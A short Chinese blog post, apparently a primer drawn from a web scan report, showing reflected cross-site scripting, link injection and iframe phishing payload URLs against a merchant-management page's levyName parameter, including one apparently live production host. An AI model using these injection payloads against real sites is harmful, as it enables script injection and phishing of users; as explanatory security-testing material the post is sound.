buguge - Keep it simple,stupid

✅ 知识就是力量，但更重要的，是运用知识的能力✅ why buguge?

导航

公告

web渗透检测-跨站点脚本编制 & 链接注入 & 框架钓鱼（普及篇）

跨站点脚本编制

http://localhost:8080/PCBossMgr/merchant/getRateFeeByLevy.html?levyName=%27%22%2F%3E%3Cscript%3Ealert%282365%29%3C%2Fscript%3E

（%27%22%2F%3E%3Cscript%3Ealert%282365%29%3C%2Fscript%3E url解码之后是："'"/><script>alert(2365)</script>）

http://localhost:8080/PCBossMgr/merchant/getRateFeeByLevy.html?levyName=value="'"/><script>alert(2365)</script>

链接注入（便于跨站请求伪造）：

http://192.168.40.51:8180/PCBossMgr/merchant/getRateFeeByLevy.html?levyName=%22%27%3E%3CIMG+SRC%3D%22%2FWF_XSRF3624.html%22%3E

（%22%27%3E%3CIMG+SRC%3D%22%2FWF_XSRF3624.html%22%3E url解码之后是："'><IMG SRC="/WF_XSRF3624.html">）

http://localhost:8080/PCBossMgr/merchant/getRateFeeByLevy.html?levyName="'><IMG SRC="/WF_XSRF3624.html">

通过框架钓鱼

https://o.serviceshare.com/PCBossMgr/merchant/getRateFeeByLevy.html?levyName=%27%22%3E%3Ciframe+id%3D2432+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E

（%27%22%3E%3Ciframe+id%3D2432+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E url解码之后是：'"><iframe id=2432 src=http://demo.testfire.net/phishing.html>）

https://o.serviceshare.com/PCBossMgr/merchant/getRateFeeByLevy.html?levyName='"><iframe id=2432 src=http://demo.testfire.net/phishing.html>

posted on 2021-09-03 22:20 buguge 阅读(435) 评论(0) 收藏举报

刷新页面返回顶部